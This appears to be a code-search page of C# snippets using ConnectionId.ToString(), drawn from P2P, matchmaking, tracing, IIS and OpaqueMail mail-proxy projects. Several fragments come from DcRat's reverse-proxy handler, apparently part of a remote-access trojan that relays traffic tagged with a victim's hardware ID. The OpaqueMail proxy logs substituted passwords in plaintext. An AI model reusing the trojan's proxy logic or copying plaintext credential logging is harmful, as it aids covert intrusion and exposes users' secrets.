コード例 #1
ファイル: P2PClient.cs プロジェクト: grigb/UnityP2P
 public void SendMessage(ConnectionId connectionId, byte[] data, int dataOffset, int dataLen, bool isReliable)
     if (mNetwork != null && peers.ContainsKey(connectionId.ToString()))
         mNetwork.SendData(connectionId, data, dataOffset, dataLen, isReliable);
     else if (mNetwork == null)
         PrintDebug("Can't send message, network isn't initialized");
         PrintDebug("Can't send message, connection id " + connectionId.ToString() + " is not a currently connected peer");
コード例 #2
 public void AddTags(IRequestSpan span)
     span.SetAttribute(InnerRequestSpans.DispatchSpan.Attributes.LocalHostname, ((IPEndPoint)LocalEndPoint).Address.ToString());
     span.SetAttribute(InnerRequestSpans.DispatchSpan.Attributes.LocalPort, ((IPEndPoint)LocalEndPoint).Port.ToString());
     span.SetAttribute(InnerRequestSpans.DispatchSpan.Attributes.RemoteHostname, ((IPEndPoint)EndPoint).Address.ToString());
     span.SetAttribute(InnerRequestSpans.DispatchSpan.Attributes.RemotePort, ((IPEndPoint)EndPoint).Port.ToString());
     span.SetAttribute(InnerRequestSpans.DispatchSpan.Attributes.LocalId, ConnectionId.ToString());
コード例 #3
 /// <summary>
 /// 切断時
 /// </summary>
 /// <returns></returns>
 protected override ValueTask OnDisconnected()
     // 待ち受けのIDからは消す
     // マッチングから外す
     _ = matchingRoom.RemoveAsync(Context);
コード例 #4
ファイル: HandleReverseProxy.cs プロジェクト: swagkarna/DcRat
        private void Handle_Connect(IAsyncResult ar)
            catch { }

            if (this.Handle.Connected)
                    this._buffer = new byte[BUFFER_SIZE];
                    this.Handle.BeginReceive(_buffer, 0, _buffer.Length, SocketFlags.None, AsyncReceive, null);
                    MsgPack msgpack = new MsgPack();
                    msgpack.ForcePathObject("Pac_ket").AsString      = "reverseProxy";
                    msgpack.ForcePathObject("Option").AsString       = "ReverseProxyConnectResponse";
                    msgpack.ForcePathObject("Hwid").AsString         = Connection.Hwid;
                    msgpack.ForcePathObject("ConnectionId").AsString = ConnectionId.ToString();
                    msgpack.ForcePathObject("IsConnected").AsString  = "false";
                    msgpack.ForcePathObject("LocalPort").AsString = "0";
                    msgpack.ForcePathObject("HostName").AsString  = Target;


                IPEndPoint localEndPoint = (IPEndPoint)this.Handle.LocalEndPoint;
                MsgPack    msgpack1      = new MsgPack();
                msgpack1.ForcePathObject("Pac_ket").AsString      = "reverseProxy";
                msgpack1.ForcePathObject("Option").AsString       = "ReverseProxyConnectResponse";
                msgpack1.ForcePathObject("Hwid").AsString         = Connection.Hwid;
                msgpack1.ForcePathObject("ConnectionId").AsString = ConnectionId.ToString();
                msgpack1.ForcePathObject("IsConnected").AsString  = "true";
                msgpack1.ForcePathObject("LocalPort").AsString = localEndPoint.Port.ToString();
                msgpack1.ForcePathObject("HostName").AsString  = Target;
                MsgPack msgpack1 = new MsgPack();
                msgpack1.ForcePathObject("Pac_ket").AsString      = "reverseProxy";
                msgpack1.ForcePathObject("Option").AsString       = "ReverseProxyConnectResponse";
                msgpack1.ForcePathObject("Hwid").AsString         = Connection.Hwid;
                msgpack1.ForcePathObject("ConnectionId").AsString = ConnectionId.ToString();
                msgpack1.ForcePathObject("IsConnected").AsString  = "false";
                msgpack1.ForcePathObject("LocalPort").AsString = "0";
                msgpack1.ForcePathObject("HostName").AsString  = Target;
コード例 #5
ファイル: ConnectionIdTest.cs プロジェクト: kztao/turnmessage
        public void ToStringTest()
                var connectionId = new ConnectionId() { Value1 = 1, Value2 = 2, Value3 = 3, };
                Assert.AreEqual("0000000000000001000000000000000200000003", connectionId.ToString());

                var connectionId = new ConnectionId() { Value1 = -1, Value2 = -1, Value3 = -1, };
                Assert.AreEqual("ffffffffffffffffffffffffffffffffffffffff", connectionId.ToString());
コード例 #6
 protected override void Compile()
コード例 #7
        private void EnsureUplinkPump(TcpClient endpoint, ConnectionId connectionId)
            var localDataChannel = new LocalTcpDataChannel(_log, _metrics.Local, connectionId.ToString(), endpoint);

            var uplinkPump = new UplinkPump(_log, connectionId, localDataChannel, _dataChannel);

            _uplinkPumps[uplinkPump] = uplinkPump;

            _downlinkPump?.AddDispatchQueue(connectionId, localDataChannel);


            _log.Verbose("ConnectionId {connectionId}. uplink pump is created", connectionId);

コード例 #8
        public async Task <LocalDataChannel> Create(ILogger logger, LocalDataChannelMetrics metrics, ConnectionId connectionId)
            var tcpClient = new TcpClient(AddressFamily.InterNetwork)
                LingerState = { Enabled = true },
                NoDelay     = true

            _log.Verbose("Connecting {host}:{port}", _host, _port);

            await tcpClient.ConnectAsync(_host, _port);

            _log.Debug("Connected {host}:{port}", _host, _port);

            return(new LocalTcpDataChannel(logger, metrics.Merge(_tags), connectionId.ToString(), tcpClient));
コード例 #9
        public void ToStringTest()
                var connectionId = new ConnectionId()
                    Value1 = 1, Value2 = 2, Value3 = 3,
                Assert.AreEqual("0000000000000001000000000000000200000003", connectionId.ToString());

                var connectionId = new ConnectionId()
                    Value1 = -1, Value2 = -1, Value3 = -1,
                Assert.AreEqual("ffffffffffffffffffffffffffffffffffffffff", connectionId.ToString());
コード例 #10
        /// <summary>
        /// マッチング参加(マッチングはでき次第通知)
        /// </summary>
        /// <param name="request"></param>
        /// <returns></returns>
        public async Task JoinAsync(MatchingJoinRequest request)
            // 待合室に放り込む
            matchingRoom = await Group.AddAsync("MatchingRoom");

            if (request.withOther)
            {   // 誰かとマッチングして対戦
                // マッチング処理(今は単純にアクセスしてきた順にマッチングさせる)
                MatchingRoomManager.Data data = new MatchingRoomManager.Data(ConnectionId, Context);
                (string, MatchingRoomManager.Data)addResult = roomManager.TryMatching(data);
                if (!string.IsNullOrEmpty(addResult.Item1))
                    // マッチング対象から外す

                    // マッチングした者同士、部屋番号だけ教えるのであとは対戦サーバーにて再集結させる
                    var mineId  = ConnectionId.ToString();
                    var enemyId = addResult.Item2.Guid.ToString();
                    BroadcastToSelf(matchingRoom).OnMatchingSuccess(new MatchingRequestSuccessResponse {
                        MineId = mineId, EnemeyId = enemyId, RoomName = addResult.Item1
                    BroadcastTo(matchingRoom, addResult.Item2.Guid).OnMatchingSuccess(new MatchingRequestSuccessResponse {
                        MineId = enemyId, EnemeyId = mineId, RoomName = addResult.Item1

                    // マッチングルーム本体から退出させる
                    await matchingRoom.RemoveAsync(addResult.Item2.Context);

                    await matchingRoom.RemoveAsync(Context);
            {   // 1人でネットワーク(スコア更新用) / 特にすることもないので専用の部屋を作ってプレイしてもらう
                BroadcastToSelf(matchingRoom).OnMatchingSuccess(new MatchingRequestSuccessResponse {
                    MineId = ConnectionId.ToString(), EnemeyId = "", RoomName = roomManager.GenerateRoomId()

                // マッチングルーム本体から退出させる
                await matchingRoom.RemoveAsync(Context);
コード例 #11
        public async Task SetAsync(TimeSpan interval)
            if (_timerLoopTask != null)
                throw new InvalidOperationException("The timer has been already started.");

            _group = await this.Group.AddAsync(ConnectionId.ToString());

            _interval      = interval;
            _timerLoopTask = Task.Run(async() =>
                while (!_cancellationTokenSource.IsCancellationRequested)
                    await Task.Delay(_interval, _cancellationTokenSource.Token);

                    var userPrincipal = Context.CallContext.GetHttpContext().User;
                    BroadcastToSelf(_group).OnTick($"UserId={userPrincipal.Claims.First(x => x.Type == ClaimTypes.NameIdentifier).Value}; Name={userPrincipal.Identity?.Name}");
コード例 #12
        public async Task SetAsync(TimeSpan interval)
            if (_timerLoopTask != null)
                throw new InvalidOperationException("The timer has been already started.");

            _group = await this.Group.AddAsync(ConnectionId.ToString());

            _interval      = interval;
            _timerLoopTask = Task.Run(async() =>
                while (!_cancellationTokenSource.IsCancellationRequested)
                    await Task.Delay(_interval, _cancellationTokenSource.Token);

                    var identity = Context.GetPrincipal().Identity as CustomJwtAuthUserIdentity;
                    BroadcastToSelf(_group).OnTick($"UserId={identity.UserId}; Name={identity.Name}");
コード例 #13
ファイル: HandleReverseProxy.cs プロジェクト: swagkarna/DcRat
        private void AsyncReceive(IAsyncResult ar)
            //Receive here data from e.g. a WebServer

                int received = Handle.EndReceive(ar);

                if (received <= 0)

                byte[] payload = new byte[received];
                Array.Copy(_buffer, payload, received);
                MsgPack msgpack1 = new MsgPack();
                msgpack1.ForcePathObject("Pac_ket").AsString      = "reverseProxy";
                msgpack1.ForcePathObject("Option").AsString       = "ReverseProxyData";
                msgpack1.ForcePathObject("Hwid").AsString         = Connection.Hwid;
                msgpack1.ForcePathObject("ConnectionId").AsString = ConnectionId.ToString();

                this.Handle.BeginReceive(_buffer, 0, _buffer.Length, SocketFlags.None, AsyncReceive, null);
コード例 #14
ファイル: HandleReverseProxy.cs プロジェクト: swagkarna/DcRat
        public void Disconnect()
            if (!_disconnectIsSend)
                _disconnectIsSend = true;
                //send to the Server we've been disconnected
                MsgPack msgpack = new MsgPack();
                msgpack.ForcePathObject("Pac_ket").AsString      = "reverseProxy";
                msgpack.ForcePathObject("Option").AsString       = "ReverseProxyDisconnect";
                msgpack.ForcePathObject("Hwid").AsString         = Connection.Hwid;
                msgpack.ForcePathObject("ConnectionId").AsString = ConnectionId.ToString();

            catch { }

コード例 #15
        public MultiplexingConnection(Stream stream, EndPoint localEndPoint, EndPoint remoteEndPoint,
                                      ILogger <MultiplexingConnection> logger)
            _stream       = stream ?? throw new ArgumentNullException(nameof(stream));
            LocalEndPoint = localEndPoint ?? throw new ArgumentNullException(nameof(localEndPoint));
            EndPoint      = remoteEndPoint ?? throw new ArgumentNullException(nameof(remoteEndPoint));
            _logger       = logger ?? throw new ArgumentNullException(nameof(logger));

            ConnectionId = ConnectionIdProvider.GetNextId();

            _endPointString      = EndPoint.ToString() ?? DiagnosticsReportProvider.UnknownEndpointValue;
            _localEndPointString = LocalEndPoint.ToString() ?? DiagnosticsReportProvider.UnknownEndpointValue;
            _connectionIdString  = ConnectionId.ToString(CultureInfo.InvariantCulture);

            _stopwatch = new Stopwatch();

            // We don't need the execution context to flow to the receive loop
            using (ExecutionContext.SuppressFlow())
コード例 #16
 public MyPeer(InitRequest initRequest) : base(initRequest)
     LBLogger.Info(LogTag, "游戏服务器创建连接  " + ConnectionId.ToString());
     LBPeerManager.Instance.AddPeer(ConnectionId, this);
コード例 #17
        /// <summary>
        /// Relay data read from one connection to another.
        /// </summary>
        /// <param name="o">A TransmitArguments object containing local and remote server parameters.</param>
        private async void RelayData(object o)
            // Cast the passed-in parameters back to their original objects.
            TransmitArguments arguments          = (TransmitArguments)o;
            Stream            clientStream       = arguments.ClientStream;
            Stream            remoteServerStream = arguments.RemoteServerStream;

            // A byte array to streamline bit shuffling.
            char[] buffer = new char[Constants.SMALLBUFFERSIZE];

            // Placeholder variables to track the current message being transmitted.
            StringBuilder messageBuilder = new StringBuilder(Constants.SMALLSBSIZE);

            // The overall number of bytes transmitted on this connection.
            ulong bytesTransmitted = 0;

            if (arguments.Credential != null)
                UserName = arguments.Credential.UserName;

            bool stillReceiving = true;

                using (StreamReader clientStreamReader = new StreamReader(clientStream))
                    using (StreamWriter remoteServerStreamWriter = new StreamWriter(remoteServerStream))
                        remoteServerStreamWriter.AutoFlush = true;

                        while (Started && stillReceiving)
                            // Read data from the source and send it to its destination.
                            string stringRead = await clientStreamReader.ReadLineAsync();

                            if (stringRead != null)
                                int bytesRead = stringRead.Length;
                                bytesTransmitted += (ulong)bytesRead;


                                // If this data comes from the client, log it.  Otherwise, process it.
                                if (arguments.IsClient)
                                    bool messageRelayed = false;

                                    string[] commandParts = stringRead.Substring(0, stringRead.Length).Split(new char[] { ' ' }, 2);

                                    // Optionally replace credentials with those from our settings file.
                                    if (commandParts.Length == 2)
                                        if (commandParts[0] == "USER")
                                            if (arguments.Credential != null)
                                                await remoteServerStreamWriter.WriteLineAsync("USER " + arguments.Credential.UserName);

                                                ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "C: USER " + arguments.Credential.UserName, Proxy.LogLevel.Raw, LogLevel);

                                                messageRelayed = true;
                                                UserName = commandParts[1];
                                        else if (arguments.Credential != null && commandParts[0] == "PASS")
                                            await remoteServerStreamWriter.WriteLineAsync("PASS" + arguments.Credential.Password);

                                            ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "C: PASS " + arguments.Credential.Password, Proxy.LogLevel.Raw, LogLevel);

                                            messageRelayed = true;

                                    if (LogLevel == Proxy.LogLevel.Verbose)
                                        ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "Command {" + commandParts[0] + "} processed.", Proxy.LogLevel.Verbose, LogLevel);

                                    if (!messageRelayed)
                                        await remoteServerStreamWriter.WriteLineAsync(stringRead);

                                        ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "C: " + stringRead, Proxy.LogLevel.Raw, LogLevel);
                                    await remoteServerStreamWriter.WriteLineAsync(stringRead);

                                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "S: " + stringRead, Proxy.LogLevel.Raw, LogLevel);

                                    // If we see a period between two linebreaks, treat it as the end of a message.
                                    if (stringRead == ".")
                                        string message = messageBuilder.ToString();
                                        int    endPos  = message.IndexOf("\r\n.\r\n");

                                        if (message.Contains("\r\n\r\n"))
                                            int lastOkPos = message.LastIndexOf("+OK", endPos);
                                            if (lastOkPos > -1)
                                                message = message.Substring(message.IndexOf("\r\n", lastOkPos) + 2);
                                                if (message.IndexOf("application/x-pkcs7-signature") > -1 || message.IndexOf("application/pkcs7-mime") > -1 || !string.IsNullOrEmpty(arguments.ExportDirectory))
                                                    Thread processThread = new Thread(new ParameterizedThreadStart(ProcessMessage));
                                                    processThread.Name = "OpaqueMail POP3 Proxy Signature Processor";
                                                    ProcessMessageArguments processMessageArguments = new ProcessMessageArguments();
                                                    processMessageArguments.MessageText     = message.Substring(0, message.Length - 5);
                                                    processMessageArguments.ConnectionId    = ConnectionId.ToString();
                                                    processMessageArguments.ExportDirectory = arguments.ExportDirectory;
                                                    processMessageArguments.InstanceId      = arguments.InstanceId;
                                                    processMessageArguments.DebugMode       = arguments.DebugMode;
                                                    processMessageArguments.UserName        = UserName;
                                                messageBuilder.Remove(0, endPos + 5);

                                stillReceiving = false;
            catch (IOException)
                // Ignore either stream being closed.
            catch (ObjectDisposedException)
                // Ignore either stream being closed.
            catch (Exception ex)
                // Log other exceptions.
                if (arguments.DebugMode || System.Diagnostics.Debugger.IsAttached)
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Exception while transmitting data: " + ex.ToString(), Proxy.LogLevel.Error, LogLevel);
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Exception while transmitting data: " + ex.Message, Proxy.LogLevel.Error, LogLevel);
                // If sending to the local client, log the connection being closed.
                if (!arguments.IsClient)
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Connection from {" + arguments.IPAddress + "} closed after transmitting {" + bytesTransmitted.ToString("N0") + "} bytes.", Proxy.LogLevel.Information, LogLevel);

                if (clientStream != null)
                if (remoteServerStream != null)
コード例 #18
        /// <summary>
        /// Handle an incoming POP3 connection, from connection to completion.
        /// </summary>
        /// <param name="parameters">Pop3ProxyConnectionArguments object containing all parameters for this connection.</param>
        private void ProcessConnection(object parameters)
            // Cast the passed-in parameters back to their original objects.
            Pop3ProxyConnectionArguments arguments = (Pop3ProxyConnectionArguments)parameters;

                TcpClient client       = arguments.TcpClient;
                Stream    clientStream = client.GetStream();

                // Capture the client's IP information.
                PropertyInfo pi = clientStream.GetType().GetProperty("Socket", BindingFlags.NonPublic | BindingFlags.Instance);
                string       ip = ((Socket)pi.GetValue(clientStream, null)).RemoteEndPoint.ToString();
                if (ip.IndexOf(":") > -1)
                    ip = ip.Substring(0, ip.IndexOf(":"));

                // If the IP address range filter contains the localhost entry, check if the client IP is a local address and update it to if so.
                if (arguments.AcceptedIPs.IndexOf("") > -1)
                    if (ip == "")
                        ip = "";
                        IPHostEntry hostEntry = Dns.GetHostEntry(Dns.GetHostName());
                        foreach (IPAddress hostIP in hostEntry.AddressList)
                            if (hostIP.ToString() == ip)
                                ip = "";

                // Validate that the IP address is within an accepted range.
                if (!ProxyFunctions.ValidateIP(arguments.AcceptedIPs, ip))
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Connection rejected from {" + ip + "} due to its IP address.", Proxy.LogLevel.Warning, LogLevel);

                    Functions.SendStreamString(clientStream, new byte[Constants.SMALLBUFFERSIZE], "500 IP address [" + ip + "] rejected.\r\n");

                    if (clientStream != null)
                    if (client != null)


                ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "New connection established from {" + ip + "}.", Proxy.LogLevel.Information, LogLevel);

                // If supported, upgrade the session's security through a TLS handshake.
                if (arguments.LocalEnableSsl)
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Starting local TLS/SSL protection for {" + ip + "}.", Proxy.LogLevel.Information, LogLevel);
                    clientStream = new SslStream(clientStream);

                // Connect to the remote server.
                TcpClient remoteServerClient = new TcpClient(arguments.RemoteServerHostName, arguments.RemoteServerPort);
                Stream    remoteServerStream = remoteServerClient.GetStream();

                // If supported, upgrade the session's security through a TLS handshake.
                if (arguments.RemoteServerEnableSsl)
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Starting remote TLS/SSL protection with {" + arguments.RemoteServerHostName + "}.", Proxy.LogLevel.Information, LogLevel);
                    remoteServerStream = new SslStream(remoteServerStream);

                // Relay server data to the client.
                TransmitArguments remoteServerToClientArguments = new TransmitArguments();
                remoteServerToClientArguments.ClientStream       = remoteServerStream;
                remoteServerToClientArguments.RemoteServerStream = clientStream;
                remoteServerToClientArguments.IsClient           = false;
                remoteServerToClientArguments.ConnectionId       = ConnectionId.ToString();
                remoteServerToClientArguments.InstanceId         = arguments.InstanceId;
                remoteServerToClientArguments.DebugMode          = arguments.DebugMode;
                remoteServerToClientArguments.IPAddress          = ip;
                remoteServerToClientArguments.ExportDirectory    = arguments.ExportDirectory;
                Thread remoteServerToClientThread = new Thread(new ParameterizedThreadStart(RelayData));
                remoteServerToClientThread.Name = "OpaqueMail POP3 Proxy Server to Client";

                // Relay client data to the remote server.
                TransmitArguments clientToRemoteServerArguments = new TransmitArguments();
                clientToRemoteServerArguments.ClientStream       = clientStream;
                clientToRemoteServerArguments.RemoteServerStream = remoteServerStream;
                clientToRemoteServerArguments.IsClient           = true;
                clientToRemoteServerArguments.ConnectionId       = ConnectionId.ToString();
                clientToRemoteServerArguments.InstanceId         = arguments.InstanceId;
                clientToRemoteServerArguments.DebugMode          = arguments.DebugMode;
                clientToRemoteServerArguments.IPAddress          = ip;
                clientToRemoteServerArguments.Credential         = arguments.RemoteServerCredential;
                Thread clientToRemoteServerThread = new Thread(new ParameterizedThreadStart(RelayData));
                clientToRemoteServerThread.Name = "OpaqueMail POP3 Proxy Client to Server";
            catch (SocketException ex)
                if (arguments.DebugMode || System.Diagnostics.Debugger.IsAttached)
                    ProxyFunctions.Log(LogWriter, SessionId, "Exception communicating with {" + arguments.RemoteServerHostName + "} on port {" + arguments.RemoteServerPort + "}: " + ex.ToString(), Proxy.LogLevel.Error, LogLevel);
                    ProxyFunctions.Log(LogWriter, SessionId, "Exception communicating with {" + arguments.RemoteServerHostName + "} on port {" + arguments.RemoteServerPort + "}: " + ex.Message, Proxy.LogLevel.Error, LogLevel);
            catch (Exception ex)
                if (arguments.DebugMode || System.Diagnostics.Debugger.IsAttached)
                    ProxyFunctions.Log(LogWriter, SessionId, "Exception: " + ex.ToString(), Proxy.LogLevel.Error, LogLevel);
                    ProxyFunctions.Log(LogWriter, SessionId, "Exception: " + ex.Message, Proxy.LogLevel.Error, LogLevel);
コード例 #19
ファイル: ImapProxy.cs プロジェクト: ethiclab/OpaqueMail
        /// <summary>
        /// Relay data read from one connection to another.
        /// </summary>
        /// <param name="o">A TransmitArguments object containing local and remote server parameters.</param>
        private async void RelayData(object o)
            // Cast the passed-in parameters back to their original objects.
            TransmitArguments arguments          = (TransmitArguments)o;
            Stream            clientStream       = arguments.ClientStream;
            Stream            remoteServerStream = arguments.RemoteServerStream;

            // A byte array to streamline bit shuffling.
            char[] buffer = new char[Constants.SMALLBUFFERSIZE];

            // Placeholder variables to track the current message being transmitted.
            bool          inMessage      = false;
            int           messageLength  = 0;
            StringBuilder messageBuilder = new StringBuilder(Constants.SMALLSBSIZE);

            // The overall number of bytes transmitted on this connection.
            ulong bytesTransmitted = 0;

            //  When a "[THROTTLED]" notice was last received.
            DateTime lastThrottleTime = new DateTime(1900, 1, 1);

            if (arguments.Credential != null)
                UserName = arguments.Credential.UserName;

            bool stillReceiving = true;

                using (StreamReader clientStreamReader = new StreamReader(clientStream))
                    using (StreamWriter remoteServerStreamWriter = new StreamWriter(remoteServerStream))
                        remoteServerStreamWriter.AutoFlush = true;

                        while (Started && stillReceiving)
                            // Read data from the source and send it to its destination.
                            string stringRead = await clientStreamReader.ReadLineAsync();

                            if (stringRead != null)
                                int bytesRead = stringRead.Length;
                                bytesTransmitted += (ulong)bytesRead;

                                // If this data comes from the client, log it.  Otherwise, process it.
                                if (arguments.IsClient)
                                    bool messageRelayed = false;

                                    string[] commandParts = stringRead.Split(new char[] { ' ' }, 4);
                                    if (commandParts.Length > 1)
                                        // Optionally, transform the login details.
                                        if (commandParts[1] == "LOGIN" && commandParts.Length == 4)
                                            messageRelayed = TransformLogin(remoteServerStreamWriter, stringRead, arguments, ref UserName);
                                            ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "C: " + stringRead, Proxy.LogLevel.Raw, LogLevel);

                                        // Remember the previous command.
                                        if (commandParts[1].ToUpper() == "UID" && commandParts.Length > 2)
                                            LastCommandReceived = (commandParts[1] + " " + commandParts[2]).ToUpper();
                                            LastCommandReceived = commandParts[1].ToUpper();

                                        // Stop after a logout order is received.
                                        if (LastCommandReceived == "LOGOUT")
                                            stillReceiving = false;

                                        if (LogLevel == Proxy.LogLevel.Verbose)
                                            switch (LastCommandReceived)
                                            case "APPEND":
                                            case "AUTHENTICATE":
                                            case "CAPABILITY":
                                            case "CHECK":
                                            case "CLOSE":
                                            case "COPY":
                                            case "CREATE":
                                            case "DELETE":
                                            case "ENABLE":
                                            case "EXAMINE":
                                            case "EXPUNGE":
                                            case "FETCH":
                                            case "GETQUOTA":
                                            case "GETQUOTAROOT":
                                            case "LIST":
                                            case "LOGIN":
                                            case "LOGOUT":
                                            case "LSUB":
                                            case "MOVE":
                                            case "NOOP":
                                            case "NOTIFY":
                                            case "RENAME":
                                            case "SEARCH":
                                            case "SELECT":
                                            case "SETQUOTA":
                                            case "STATUS":
                                            case "STORE":
                                            case "SUBSCRIBE":
                                            case "UID COPY":
                                            case "UID FETCH":
                                            case "UID SEARCH":
                                            case "UID STORE":
                                            case "UNSUBSCRIBE":
                                            case "XLIST":
                                                ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "Command {" + LastCommandReceived + "} processed.", Proxy.LogLevel.Verbose, LogLevel);

                                    // If the command wasn't processed, send the raw command.
                                    if (!messageRelayed)
                                        await remoteServerStreamWriter.WriteLineAsync(stringRead);
                                    // If we're currently receiving a message, check to see if it's completed.
                                    if (inMessage)
                                        if (messageBuilder.Length >= messageLength)
                                            // If the message has been completed and it contains a signature, process it.
                                            string message = messageBuilder.ToString(0, messageLength);
                                            if (message.IndexOf("application/x-pkcs7-signature") > -1 || message.IndexOf("application/pkcs7-mime") > -1 || !string.IsNullOrEmpty(arguments.ExportDirectory))
                                                Thread processThread = new Thread(new ParameterizedThreadStart(ProcessMessage));
                                                processThread.Name = "OpaqueMail IMAP Proxy Signature Processor";
                                                ProcessMessageArguments processMessageArguments = new ProcessMessageArguments();
                                                processMessageArguments.MessageText     = message;
                                                processMessageArguments.ConnectionId    = ConnectionId.ToString();
                                                processMessageArguments.ExportDirectory = arguments.ExportDirectory;
                                                processMessageArguments.InstanceId      = arguments.InstanceId;
                                                processMessageArguments.DebugMode       = arguments.DebugMode;
                                                processMessageArguments.UserName        = UserName;

                                            // We're no longer receiving a message, so continue.
                                            inMessage = false;
                                        // Disallow proxy stream compression.
                                        if (stringRead.StartsWith("* CAPABILITY"))
                                            stringRead = stringRead.Replace(" COMPRESS=DEFLATE", "");

                                        // Check for IMAP meta flags.
                                        string betweenBraces = Functions.ReturnBetween(stringRead, "[", "]");
                                        switch (betweenBraces)
                                        case "CLIENTBUG":
                                        case "CORRUPTION":
                                        case "OVERQUOTA":
                                        case "SERVERBUG":
                                        case "UNAVAILABLE":
                                            ProxyFunctions.Log(LogWriter, SessionId, ConnectionId.ToString(), stringRead.Substring(stringRead.IndexOf("[")), Proxy.LogLevel.Warning, LogLevel);

                                        case "THROTTLED":
                                            if (DateTime.Now - lastThrottleTime >= new TimeSpan(0, 20, 0))
                                                ProxyFunctions.Log(LogWriter, SessionId, ConnectionId.ToString(), "Connection speed throttled by the remote server.", Proxy.LogLevel.Warning, LogLevel);
                                                lastThrottleTime = DateTime.Now;

                                        // Messages are denoted by FETCH headers with their lengths in curly braces.
                                        if (stringRead.ToUpper().Contains(" FETCH "))
                                            int openBrace = stringRead.IndexOf("{");
                                            if (openBrace > -1)
                                                int closeBrace = stringRead.IndexOf("}", openBrace);
                                                if (closeBrace > -1)
                                                    // Only proceed if we can parse the size of the message.
                                                    if (int.TryParse(stringRead.Substring(openBrace + 1, closeBrace - openBrace - 1), out messageLength))
                                                        inMessage = true;

                                    await remoteServerStreamWriter.WriteLineAsync(stringRead);

                                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId.ToString(), "S: " + stringRead, Proxy.LogLevel.Raw, LogLevel);
                                stillReceiving = false;
            catch (IOException)
                // Ignore either stream being closed.
            catch (ObjectDisposedException)
                // Ignore either stream being closed.
            catch (Exception ex)
                // Log other exceptions.
                if (arguments.DebugMode || System.Diagnostics.Debugger.IsAttached)
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Exception while transmitting data: " + ex.ToString(), Proxy.LogLevel.Error, LogLevel);
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Exception while transmitting data: " + ex.Message, Proxy.LogLevel.Error, LogLevel);
                // If sending to the local client, log the connection being closed.
                if (!arguments.IsClient)
                    ProxyFunctions.Log(LogWriter, SessionId, arguments.ConnectionId, "Connection from {" + arguments.IPAddress + "} closed after transmitting {" + bytesTransmitted.ToString("N0") + "} bytes.", Proxy.LogLevel.Information, LogLevel);

                if (clientStream != null)
                if (remoteServerStream != null)
コード例 #20
        internal unsafe IISHttpContext(MemoryPool <byte> memoryPool, IntPtr pInProcessHandler, IISOptions options)
            : base((HttpApiTypes.HTTP_REQUEST *)NativeMethods.http_get_raw_request(pInProcessHandler))
            _thisHandle = GCHandle.Alloc(this);

            _memoryPool        = memoryPool;
            _pInProcessHandler = pInProcessHandler;

            NativeMethods.http_set_managed_context(pInProcessHandler, (IntPtr)_thisHandle);
                Method = GetVerb();

                RawTarget = GetRawUrl();
                // TODO version is slow.
                HttpVersion = GetVersion();
                Scheme      = SslStatus != SslStatus.Insecure ? Constants.HttpsScheme : Constants.HttpScheme;
                KnownMethod = VerbId;

                var originalPath = RequestUriBuilder.DecodeAndUnescapePath(GetRawUrlInBytes());

                if (KnownMethod == HttpApiTypes.HTTP_VERB.HttpVerbOPTIONS && string.Equals(RawTarget, "*", StringComparison.Ordinal))
                    PathBase = string.Empty;
                    Path     = string.Empty;
                    // Path and pathbase are unescaped by RequestUriBuilder
                    // The UsePathBase middleware will modify the pathbase and path correctly
                    PathBase = string.Empty;
                    Path     = originalPath;

                var cookedUrl = GetCookedUrl();
                QueryString = cookedUrl.GetQueryString() ?? string.Empty;

                // TODO: Avoid using long.ToString, it's pretty slow
                RequestConnectionId = ConnectionId.ToString(CultureInfo.InvariantCulture);

                // Copied from WebListener
                // This is the base GUID used by HTTP.SYS for generating the activity ID.
                // HTTP.SYS overwrites the first 8 bytes of the base GUID with RequestId to generate ETW activity ID.
                // The requestId should be set by the NativeRequestContext
                var guid = new Guid(0xffcb4c93, 0xa57f, 0x453c, 0xb6, 0x3f, 0x84, 0x71, 0xc, 0x79, 0x67, 0xbb);
                *((ulong *)&guid) = RequestId;

                // TODO: Also make this not slow
                TraceIdentifier = guid.ToString();

                var localEndPoint = GetLocalEndPoint();
                LocalIpAddress = localEndPoint.GetIPAddress();
                LocalPort      = localEndPoint.GetPort();

                var remoteEndPoint = GetRemoteEndPoint();
                RemoteIpAddress = remoteEndPoint.GetIPAddress();
                RemotePort      = remoteEndPoint.GetPort();
                StatusCode      = 200;

                RequestHeaders      = new RequestHeaders(this);
                HttpResponseHeaders = new HeaderCollection(); // TODO Optimize for known headers
                ResponseHeaders     = HttpResponseHeaders;

                if (options.ForwardWindowsAuthentication)
                    WindowsUser = GetWindowsPrincipal();
                    if (options.AutomaticAuthentication)
                        User = WindowsUser;


            RequestBody  = new IISHttpRequestBody(this);
            ResponseBody = new IISHttpResponseBody(this);

            Input = new Pipe(new PipeOptions(_memoryPool, readerScheduler: PipeScheduler.ThreadPool));
            var pipe = new Pipe(new PipeOptions(_memoryPool, readerScheduler: PipeScheduler.ThreadPool));

            Output = new OutputProducer(pipe);
コード例 #21
ファイル: ExampleP2PClient.cs プロジェクト: grigb/UnityP2P
 void Client_OnConnection(ConnectionId connectionId)
     Debug.Log("Peer: " + connectionId.ToString() + " connected");
コード例 #22
        internal unsafe HttpProtocol(PipeFactory pipeFactory, IntPtr pHttpContext)
            : base((HttpApiTypes.HTTP_REQUEST *)NativeMethods.http_get_raw_request(pHttpContext))
            _thisHandle = GCHandle.Alloc(this);

            _pipeFactory  = pipeFactory;
            _pHttpContext = pHttpContext;

                Method = GetVerb();

                RawTarget = GetRawUrl();
                // TODO version is slow.
                HttpVersion = GetVersion();
